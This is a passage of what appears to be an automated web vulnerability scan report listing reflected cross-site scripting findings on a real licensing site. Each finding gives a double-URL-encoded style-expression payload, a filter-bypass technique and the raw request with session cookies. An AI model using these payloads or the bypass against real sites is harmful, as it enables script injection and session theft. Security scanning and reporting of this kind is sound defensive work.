GET /NBA/portland_trail_blazers?8dc4e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d08698a97ec=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.47. http://www.turnerlicensing.com/NBA/sacramento_kings [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/sacramento_kings
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7b27%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dbda3da870d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7b27'style='x:expression(alert(1))'dbda3da870d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/sacramento_kings?a7b27%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dbda3da870d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.48. http://www.turnerlicensing.com/NBA/san_antonio_spurs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/san_antonio_spurs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7529%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795ef547ec66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7529'style='x:expression(alert(1))'95ef547ec66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/san_antonio_spurs?f7529%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795ef547ec66=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.49. http://www.turnerlicensing.com/NBA/san_antonio_spurs/8010807 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/san_antonio_spurs/8010807
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae55b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274a4aaea7f43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae55b'style='x:expression(alert(1))'4a4aaea7f43 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.50. http://www.turnerlicensing.com/NBA/seattle_supersonics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/seattle_supersonics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e46d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252767e2d14c890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e46d'style='x:expression(alert(1))'67e2d14c890 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/seattle_supersonics?4e46d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252767e2d14c890=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.51. http://www.turnerlicensing.com/NBA/toronto_raptors [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/toronto_raptors
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 626bf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ceefe8f1570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 626bf'style='x:expression(alert(1))'ceefe8f1570 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/toronto_raptors?626bf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ceefe8f1570=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.52. http://www.turnerlicensing.com/NBA/utah_jazz [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/utah_jazz
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf4d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e0d3723f51a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf4d0'style='x:expression(alert(1))'e0d3723f51a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/utah_jazz?bf4d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e0d3723f51a=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.53. http://www.turnerlicensing.com/NBA/washington_wizards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/washington_wizards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61f21%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270b6453a6910 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61f21'style='x:expression(alert(1))'0b6453a6910 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/washington_wizards?61f21%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270b6453a6910=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.54. http://www.turnerlicensing.com/NFL [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NFL
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bff4'style='x:expression(alert(1))'467f646483f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NFL?4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.55. http://www.turnerlicensing.com/NHL [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NHL
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c378'style='x:expression(alert(1))'55966d0d35d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NHL?9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.56. http://www.turnerlicensing.com/Players [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/Players
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 830e5'style='x:expression(alert(1))'65ac4008624 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Players?830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.57. http://www.turnerlicensing.com/Stadiums [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/Stadiums
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c355'style='x:expression(alert(1))'2ca472c83b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Stadiums?4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.58. http://www.turnerlicensing.com/Turner-Contact-Us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/Turner-Contact-Us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dd9c'style='x:expression(alert(1))'7f7d614df6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Turner-Contact-Us?6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.59. http://www.turnerlicensing.com/Turner-Email-Sign-Up [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/Turner-Email-Sign-Up
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41989'style='x:expression(alert(1))'cc1e08c1a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Turner-Email-Sign-Up?41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.60. http://www.turnerlicensing.com/app/site/backend/additemtocart.nl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/app/site/backend/additemtocart.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f08f"style%3d"x%3aexpression(alert(1))"b8d118caa4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f08f"style="x:expression(alert(1))"b8d118caa4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
1.61. http://www.turnerlicensing.com/book_covers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/book_covers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c755e'style='x:expression(alert(1))'f5f16d43fab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /book_covers?c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.62. http://www.turnerlicensing.com/box_calendars [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/box_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45e75'style='x:expression(alert(1))'5e5156453d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
